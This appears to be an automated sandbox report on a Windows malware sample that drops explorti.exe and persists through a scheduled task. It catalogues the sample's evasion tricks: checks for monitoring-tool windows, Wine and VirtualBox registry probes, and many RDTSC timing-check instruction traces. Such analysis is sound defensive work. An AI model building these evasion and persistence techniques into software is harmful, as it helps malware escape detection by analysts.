Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: f3wrBtIYXx.exe

Static file information: File size 1892864 > 1048576

Source: f3wrBtIYXx.exe

Static PE information: Raw size of bzkmssua is bigger than: 0x100000 < 0x19ca00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Unpacked PE file: 0.2.f3wrBtIYXx.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 7.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d3758 should be: 0x1d0178
Source: f3wrBtIYXx.exe	Static PE information: real checksum: 0x1d3758 should be: 0x1d0178

Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: .idata
Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: bzkmssua
Source: f3wrBtIYXx.exe	Static PE information: section name: sxdezqxh
Source: f3wrBtIYXx.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: bzkmssua
Source: explorti.exe.0.dr	Static PE information: section name: sxdezqxh
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0072D84C push ecx; ret

7_2_0072D85F

Source: f3wrBtIYXx.exe	Static PE information: section name: entropy: 7.988249586345587
Source: f3wrBtIYXx.exe	Static PE information: section name: bzkmssua entropy: 7.9539160203429615
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.988249586345587
Source: explorti.exe.0.dr	Static PE information: section name: bzkmssua entropy: 7.9539160203429615

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 73F280 second address: 73F284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 73EAD1 second address: 73EADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B64C8 second address: 8B64CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B661B second address: 8B6633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6633 second address: 8B6638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6638 second address: 8B664F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5F64D1DF1Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B68F7 second address: 8B6906 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007F5F64D1DAB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6906 second address: 8B690C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B690C second address: 8B6911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6911 second address: 8B6925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6925 second address: 8B6945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6A76 second address: 8B6A80 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BC2 second address: 8B6BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F5F64D1DAB6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BD1 second address: 8B6BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BD7 second address: 8B6BE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F5F64D1DAB6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6BE8 second address: 8B6BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F5F64D1DF16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D89 second address: 8B6D93 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D93 second address: 8B6D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D99 second address: 8B6D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B6D9E second address: 8B6DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BA94D second address: 8BA968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BA9BE second address: 8BAA32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F5F64D1DF1Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 jno 00007F5F64D1DF1Ch 0x00000018 pop esi 0x00000019 nop 0x0000001a jmp 00007F5F64D1DF22h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F5F64D1DF18h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b push 6F6E097Eh 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 js 00007F5F64D1DF16h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAA32 second address: 8BAA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAA38 second address: 8BAABB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DF18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 6F6E09FEh 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F5F64D1DF18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D19C8h], ebx 0x00000031 push 00000003h 0x00000033 sbb dx, 77D6h 0x00000038 push 00000000h 0x0000003a mov esi, 01B97300h 0x0000003f mov ecx, dword ptr [ebp+122D2ACFh] 0x00000045 push 00000003h 0x00000047 mov esi, dword ptr [ebp+122D2A6Bh] 0x0000004d call 00007F5F64D1DF19h 0x00000052 push esi 0x00000053 jmp 00007F5F64D1DF28h 0x00000058 pop esi 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE1D second address: 8BAE23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE23 second address: 8BAE95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F5F64D1DF23h 0x00000011 mov dword ptr [ebp+122D19A2h], esi 0x00000017 pop edx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F5F64D1DF18h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D37D7h], esi 0x0000003a call 00007F5F64D1DF19h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 jmp 00007F5F64D1DF22h 0x00000047 pop eax 0x00000048 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAE95 second address: 8BAEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEAA second address: 8BAEBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F5F64D1DF18h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEBD second address: 8BAEC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEC3 second address: 8BAEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8BAEC7 second address: 8BAED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC5F7 second address: 8CC601 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC601 second address: 8CC607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8CC607 second address: 8CC60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DA394 second address: 8DA3A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D83E4 second address: 8D83E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D83E9 second address: 8D8431 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5F64D1DAD2h 0x00000008 jmp 00007F5F64D1DAC6h 0x0000000d jns 00007F5F64D1DAB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 jg 00007F5F64D1DAB6h 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 jmp 00007F5F64D1DAC4h 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86AA second address: 8D86AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86AE second address: 8D86BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86BC second address: 8D86E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5F64D1DF16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F5F64D1DF16h 0x00000016 jmp 00007F5F64D1DF1Dh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86E0 second address: 8D86F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5F64D1DABEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86F4 second address: 8D86F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86F8 second address: 8D8702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8702 second address: 8D8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D883B second address: 8D8848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F5F64D1DAB8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8848 second address: 8D885B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F5F64D1DF16h 0x0000000b jnl 00007F5F64D1DF16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D885B second address: 8D8874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007F5F64D1DABEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8874 second address: 8D887C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D887C second address: 8D8882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8CE2 second address: 8D8CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D9ACC second address: 8D9ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DABFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D9ADF second address: 8D9AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DA1DC second address: 8DA1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DDA54 second address: 8DDA59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89E299 second address: 89E2D4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5F64D1DABEh 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jg 00007F5F64D1DABCh 0x00000016 pushad 0x00000017 ja 00007F5F64D1DAB6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DFD86 second address: 8DFDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5F64D1DF24h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DEE87 second address: 8DEE91 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DFFFE second address: 8E0022 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DF26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E0022 second address: 8E0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F5F64D1DAC3h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ebx 0x00000015 jnl 00007F5F64D1DABCh 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5F64D1DAC7h 0x00000027 rdtsc
